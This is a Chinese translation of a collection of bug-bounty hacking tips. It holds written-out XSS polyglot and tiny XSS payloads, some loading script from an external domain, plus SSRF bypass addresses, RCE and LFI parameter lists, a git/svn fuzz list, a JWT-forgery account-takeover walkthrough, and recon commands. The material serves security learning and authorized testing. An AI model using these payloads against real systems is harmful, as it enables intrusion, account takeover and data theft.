前辈们宝贵的经验技巧,第三趴 -
HTTP主机头:localhost
作者:@hacker_(由@intigriti编译)
来源:链接
在目录爆破中将“ Host”标头设置为“ localhost”,结果可能令人惊讶!您可能可以访问:
-
特殊功能
-
内部端口
-
配置文件,SSL密钥
-
目录列表,等等…
我们甚至可以更进一步,通过执行虚拟主机枚举来尝试标识目标Web服务器上托管的所有站点。使用以下工具:
-
https://github.com/ffuf/ffuf
-
https://nmap.org/nsedoc/scripts/http-vhosts.html
-
https://github.com/jobertabma/virtual-host-discovery
注意,我们也可以使用curl或wget:
curl-v -H "Host: localhost" https://target/
wget-d --header="Host: localhost" https://target/
用于XSS的JavaScript语句
作者:@s0md3v(由@lutfumertcey发推文)
来源:链接
如何为XSS制作Java语言的Polyglot?检查由@s0md3v制作的此超级有用的信息:
这是ASCII版本:
-->'"/></sCript><deTailSopen x=">" ontoggle=(cou006efirm)``>
--> Breaks comment context
' Breaks Attribute Context
" Breaks attribute context
/> Closes an open tag
</sCript> Breaks JS context
<deTailS A less known tag
open To eliminate user interaction requiredfor execution
x Dummy attribute
">" Mimics the closing of tag
ontoggle A less known event handler
() Parentheses around the function
cou006efirm"confirm" function with Unicoded 'n'
`` Backticks instead of ()
请注意,根据情况,我们可能只需要多语种的特定部分。请勿盲目复制和粘贴。
作者:@m4ll0k2
来源:链接
我们可以通过查找相同的图标图标哈希来找到与目标相关的域和子域。
这正是@m4ll0k2制作的favihash.py工具所做的。使用方法如下:
catmy_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"'> targets.txt
python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
简而言之,favihash将使我们能够发现具有与我们的目标相同的favicon图标哈希的域名。
地址如下:
-
https://github.com/Awrrays/Bug-Bounty-Toolz/blob/master/favihash.py
作者:@_mkahmad
来源:链接
这是@_mkahmad如何通过伪造JWT令牌来接管帐户的方法:
-
反编译APK并找到API端点>> / signup / users / generateJwtToken
-
发送到中继器(Burp Suite)
-
在请求中添加了Auth-Token标头
-
标头中使用了我帐户的身份验证令牌
-
删除签名部分–>有效!
-
在BurpSuite中使用JOSEPH更改了令牌中的用户ID
-
在响应中得到了其他用户的JWT令牌
-
帐户接管!
请注意,所有其他端点都在正确检查JWK令牌。
远程代码执行(RCE)参数 TOP 25
作者:@trbughunters
来源:链接
以下是可能容易受到代码注入和类似RCE漏洞攻击的前25个参数:
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
每当您看到任何这些参数时,请注意。可能您可以以某种方式在其中注入代码。
SSRF有效载荷绕过
作者:@manas_hunter
来源:链接
当涉及到SSRF(服务器端请求伪造)时,可以使用以下5种有效负载绕过防御:
1)使用CIDR绕过SSRF:
http://127.127.127.127
http://127.0.0.0
2)使用稀有地址绕行:
http://127.1
http://0
3)使用技巧组合绕过:
http://1.1.1.1&@2.2.2.2# @3.3.3.3/
urllib: 3.3.3.3
4)绕过弱解析器:
http://127.1.1.1:[email protected]:80/
5)用[::]绕过localhost:
http://[::]:80/
http://0000::1:80/
让我们提醒自己什么是SSRF漏洞,以及我们可以如何处理这些漏洞。通常,SSRF允许我们:
-
在远程服务器上运行的回送接口上的访问服务
-
扫描内部网络可能与发现的服务进行交互
-
使用file://协议处理程序读取服务器上的本地文件
-
横向移动/旋转进入内部环境
如何找到SSRF?当目标Web应用程序允许我们访问外部资源时,例如从外部URL加载的配置文件图像(在第三方网站上运行),我们可以尝试加载易受攻击的Web应用程序可访问的内部资源。例如:
-
我们发现以下URL有效:
https://example.com:8000/page?user=&link=https://127.0.0.1:8000
-
然后,我们可以尝试不同的端口来运行入侵者攻击(Burp Suite),从而有效地对主机进行端口扫描
-
我们还可以尝试扫描专用IP(例如192.168.xx)并发现内部网络中存在的IP
使用RapidDNS查找子域
作者:@Verry__D
来源:链接
将此小功能添加到您的.bash_profile
中,以使用RapidDNS
API
快速查找子域:
rapiddns(){
curl-s "https://rapiddns.io/subdomain/$1?full=1"
| grep -oP '_blank">K[^<]*'
| grep -v http
| sort -u
}
然后我们可以像这样使用它:
rapiddns target.com
非常好,快捷。
如果上传了这10条东西,你能得到什么
作者:@ SalahHasoneh1
来源:链接
以下是您可以通过上传完成的十件事:
-
ASP / ASPX / PHP5 / PHP / PHP3:Webshell / RCE
-
SVG:
存储性XSS / SSRF / XXE
-
GIF:
存储性XSS / SSRF
-
CSV:CSV
注入 -
XML:XXE
-
AVI:LFI / SSRF
-
HTML / JS:HTML
注入/ XSS /
重定向 -
PNG / JPEG:
像素泛洪攻击(DoS
) -
ZIP:
通过LFI / DoS
进行RCE
-
PDF / PPTX:SSRF /
盲XXE
极简的XSS payloads
作者:@terjanq
来源:链接
这是@terjanq制作的微小XSS
负载的集合:
<!--If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/NJ.₨?/>
<!--If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/NJ.₨?/>
<!--If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!--Just a casual script -->
<script/src=//NJ.₨></script>
<!--If you control the name of the window -->
<iframe/onload=src=top.name>
<!--If you control the name, will work on Firefox in any context, will fail inchromium in DOM -->
<svg/onload=eval(name)>
<!--If you control the URL -->
<svg/onload=eval(`'`+URL)>
请注意,其中一些XSS
有效负载包含“ contain。₨” Unicode
字符串。这是一个域名(nj.rs
)目前所拥有@terjanq与服务的PoC
代码,将引发一个XSS
状况相关的警报的web
服务器:
这使XSS
有效负载保持很小。
有关更多XSS
负载和DEMO
页面的信息,请查看他指定的Github
存储库:
-
https://github.com/terjanq/Tiny-XSS-Payloads
本地文件包含(LFI)参数 TOP 25
作者:@trbughunters
来源:链接
以下列出了可能容易受到本地文件包含(LFI)漏洞影响的前25个参数:
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
每当您看到任何这些参数时,请注意。您可能会发现LFI漏洞。
GIT和SVN文件的模糊测试列表
作者:@TobiunddasMoe
来源:链接
这是使用此小型但快速的模糊列表查找git和svn文件的快速提示:
/.git
/.git-rewrite
/.git/HEAD
/.git/config
/.git/index
/.git/logs/
/.git_release
/.gitattributes
/.gitconfig
/.gitignore
/.gitk
/.gitkeep
/.gitmodules
/.gitreview
/.svn
/.svn/entries
/.svnignore
我们可能会在其中找到一些有趣的信息。
镜像Web目录结构
作者:@2RS3C
来源:链接
找到类似此目录的目录?
使用以下“ wget”命令以递归方式将所有文件(+结构)获取到您的计算机:
wget -r--no-parent target.com/dir
现在您可以查看文件的结构,搜索和grep。
专业提示:如何在目标上查找目录列表?目录列表是Web服务器配置错误,我们可以使用以下命令进行识别:
-
谷歌傻瓜
-
Shodan搜索引擎
-
https://github.com/ffuf/ffuf
-
https://github.com/maurosoria/dirsearch
使用AlienVault OTX查找敏感信息
作者:@mariusshoratau
来源:链接
您是否听说过AlienVault Open Threat Exchange(OTX)?
用法如下:
-
转到https://otx.alienvault.com/indicator/domain/<TARGET>
-
将<TARGET>替换为目标。
-
向下滚动到“关联的网址”部分。
-
使用AlientVault OTX,您可能会找到URL,这些URL公开了有关其他用户的敏感信息(例如收据),身份验证令牌,IDOR,有趣的参数/文件以及许多其他gem。
请注意,也可以在以下位置使用API:
-
https://otx.alienvault.com/api/v1/indicators/domain/<TARGET>/url_list?limit=100&page=1
所以,这是我们可以做的:
curl-s "https://otx.alienvault.com/api/v1/indicators/domain/<TARGET>/url_list?limit=100&page=1"| jq
要仅获取URL列表,我们可以这样做:
curl-s"https://otx.alienvault.com/api/v1/indicators/domain/<TARGET>/url_list?limit=100&page=1"| jq -r '.url_list[].url'
干净利落!
内容来源:InfoSec,半仙仅做了翻译。
原文始发于微信公众号(仙友道):Hacker Tips - 3
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论